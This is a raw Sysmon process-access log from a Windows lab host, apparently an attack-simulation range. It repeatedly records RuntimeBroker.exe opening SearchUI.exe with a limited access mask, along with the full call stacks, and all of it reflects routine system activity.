13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 